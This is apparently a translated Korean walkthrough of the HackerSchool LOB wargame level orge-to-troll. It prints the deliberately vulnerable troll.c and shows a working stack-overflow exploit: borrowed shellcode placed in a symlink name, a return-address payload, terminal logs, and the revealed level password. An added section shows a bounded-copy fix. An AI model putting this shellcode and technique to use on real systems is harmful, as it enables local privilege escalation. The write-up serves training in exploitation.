
/*
        The Lord of the BOF : The Fellowship of the BOF
        - troll
        - check argc + argv hunter
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>   /* strlen, strcpy, memset */

extern char **environ;

int main(int argc, char *argv[])
{
        char buffer[40];
        int i;

        // here is changed: exactly one argument is required
        if(argc != 2){
                printf("argc must be two!\n");
                exit(0);
        }

        // egghunter: wipe every environment string so nothing can be staged there
        for(i=0; environ[i]; i++)
                memset(environ[i], 0, strlen(environ[i]));

        // byte 47 of argv[1] (the high byte of the overwritten return address) must be 0xbf
        if(argv[1][47] != '\xbf')
        {
                printf("stack is still your friend.\n");
                exit(0);
        }

        // check the length of argument: 48 bytes are still allowed into a 40-byte buffer
        if(strlen(argv[1]) > 48){
                printf("argument is too long!\n");
                exit(0);
        }

        strcpy(buffer, argv[1]);   // the intended overflow of the 40-byte buffer
        printf("%s\n", buffer);

        // buffer hunter: clear the copied data
        memset(buffer, 0, 40);

        // one more! argv[1] itself is cleared as well
        memset(argv[1], 0, strlen(argv[1]));

        return 0;
}
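As an added example (not part of the original post or the LOB source), here is the same length check written so the copy can never exceed the buffer. troll.c's `strlen(argv[1]) > 48` test still admits 48 characters plus the terminating NUL into a 40-byte buffer; `overrun_allowed` computes how many bytes past `buffer` that is, and `copy_argument` is the bounded replacement for the `strcpy`. Names and the helper functions are mine, not the challenge's.

```c
#include <string.h>

#define BUF_SIZE 40            /* same size as buffer[40] in troll.c */
#define TROLL_MAX_LEN 48       /* the limit troll.c actually enforces */

/* troll.c's check: returns 1 when the argument would be accepted and copied. */
int troll_accepts(const char *arg)
{
        return strlen(arg) <= TROLL_MAX_LEN;
}

/* Hardened check: the argument plus its terminating NUL must fit the buffer. */
int fits_in_buffer(const char *arg, size_t buflen)
{
        return strlen(arg) < buflen;
}

/* Bounded copy: returns 0 and leaves buf empty when arg does not fit,
   so an strcpy-style overrun of buf is impossible. */
int copy_argument(char *buf, size_t buflen, const char *arg)
{
        if (buflen == 0)
                return 0;
        if (!fits_in_buffer(arg, buflen)) {
                buf[0] = '\0';
                return 0;
        }
        memcpy(buf, arg, strlen(arg) + 1);
        return 1;
}

/* Convenience wrapper with a fixed 40-byte stack buffer, as in troll.c. */
int copy_into_troll_buffer(const char *arg)
{
        char buffer[BUF_SIZE];
        return copy_argument(buffer, sizeof buffer, arg);
}

/* Bytes that troll.c's check still lets strcpy write past a buflen-byte
   buffer (strlen + 1 for the NUL); 0 when the check would be adequate. */
size_t overrun_allowed(size_t buflen)
{
        size_t copied = (size_t)TROLL_MAX_LEN + 1;
        return copied > buflen ? copied - buflen : 0;
}
```

With the 40-byte buffer the original check leaves 9 bytes of overrun: the 4 saved-EBP bytes, the 4 return-address bytes the write-up overwrites, and the NUL.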

 

The conditions visible here are: an egghunter, a buffer hunter, an argv[1] hunter, the \xbf check, and argc must be exactly 2.

We have to make use of argv[0] and argv[1], but the return address cannot point into argv[1]. Why? Because it gets zeroed out.

So we have to put the shellcode into argv[0], but the shellcode we have been using so far cannot be used there.

I have not written shellcode by hand myself yet, so for the detailed reason, refer to the post at the following link.

https://dokhakdubini.tistory.com/220?category=797537

 

[HackerSchool LOB] Level 8: Orge >> Troll


The shellcode taken from the blog above is

\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81

It is 35 bytes of code in total, and it can be used as the name of a symbolic link.

[orge@localhost orge]$ ls
core  troll  troll.c
[orge@localhost orge]$ cp troll.c troop.c
[orge@localhost orge]$ vi troop.c

[1]+  Stopped                 vi troop.c
[orge@localhost orge]$ vi troop.c

[2]+  Stopped                 vi troop.c
[orge@localhost orge]$ vi troop.c
[orge@localhost orge]$ ni troop.c
bash2: ni: command not found
[orge@localhost orge]$ ? 코드를 까먹었다 ㅋ
bash2: ?: command not found
[orge@localhost orge]$ ls
core  troll  troll.c  troop.c
[orge@localhost orge]$ gcc -o troop.c
gcc: No input files
[orge@localhost orge]$ gcc -o troop troop.c
[orge@localhost orge]$ ls
core  troll  troll.c  troop  troop.c
[orge@localhost orge]$ ln -s troop `python -c 'print "\x90"*100 + "\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"'`
[orge@localhost orge]$ ls
core
troll
troll.c
troop
troop.c
????????????????????????????????????????????????????????????????????????????????????????????????????▒?^1ɱ2?l?▒??▒?u▒▒?▒▒▒▒▒2▒Qi00tii0cjo?▒QT?▒?▒?▒?
[orge@localhost orge]$ ./`python -c 'print "\x90"'* `python -c 'print "A"*44+"\xbf\xbf\xbf\xbf"'`
>
> ''
> '
> '
>
[orge@localhost orge]$
[orge@localhost orge]$ ./`python -c 'print "\x90"'`* `python -c 'print "A"*44+"\xbf\xbf\xbf\xbf"'`
bffffaa2
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA▒▒▒▒
Segmentation fault (core dumped)
[orge@localhost orge]$ rm `python -c 'print "\x90"'`*
[orge@localhost orge]$ ls
core  troll  troll.c  troop  troop.c
[orge@localhost orge]$ ln -s troll `python -c 'print "\x90"*100 + "
>
>
>
> '
> ''
> '
> '
> '
>
[orge@localhost orge]$ ln -s troll `python -c 'print "\x90"*100 + "\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"'`
[orge@localhost orge]$ ls
core
troll
troll.c
troop
troop.c
????????????????????????????????????????????????????????????????????????????????????????????????????▒?^1ɱ2?l?▒??▒?u▒▒?▒▒▒▒▒2▒Qi00tii0cjo?▒QT?▒?▒?▒?
[orge@localhost orge]$ ./`python -c 'print "\x90"'`* `python -c 'print "A"*44 + "\xa2\xfa\xff\xbf"'`
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA▒▒▒▒
bash$ my-pass
euid = 508
aspirin
bash$


But if you are not going to analyze the core file, I am not sure the NOPs really need to be put into the symbolic link.
